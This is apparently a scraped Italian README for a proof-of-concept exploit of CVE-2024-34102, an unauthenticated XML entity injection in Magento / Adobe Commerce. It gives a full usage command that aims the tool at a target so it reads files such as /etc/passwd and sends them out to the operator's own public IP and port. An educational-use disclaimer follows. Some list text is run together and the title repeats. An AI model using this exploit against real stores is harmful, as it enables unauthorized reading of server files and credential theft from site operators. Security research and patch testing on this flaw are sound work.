
POC per CVE-2024-34102. Un problema di iniezione di entità XML pre-autenticazione in Magento / Adobe Commerce.
POC per CVE-2024-34102. Un problema di iniezione di entità XML pre-autenticazione in Magento / Adobe Commerce.

Questo POC tenterà di leggere file da host target vulnerabili al recente CVE-2024-34102 di Magento / Adobe Commerce. Questo POC si basa su questo avviso di sicurezza e su questa ricerca di Assetnote.
Per eseguire questo POC, avrai bisogno di una macchina con un IP pubblicato e accessibile.
poc.xml contenente i payload principali./etc/passwd).requestsPer usare questo POC contro un singolo target:
python cve-2024-34102.py -u target -ip your-machine-ip -p any-open-port-in-your-machine -r file-to-read-from-target (default is /etc/passwd)
Per qualsiasi suggerimento o idea, contatta me.
Questo strumento fornito è solo a scopo educativo. Non incoraggio, approvo né supporto l'accesso non autorizzato a qualsiasi sistema o rete. Usa questo strumento in modo responsabile e solo su sistemi per i quali hai esplicita autorizzazione a testare. Ogni azione e conseguenza derivante dall'uso improprio di questo strumento è di tua esclusiva responsabilità.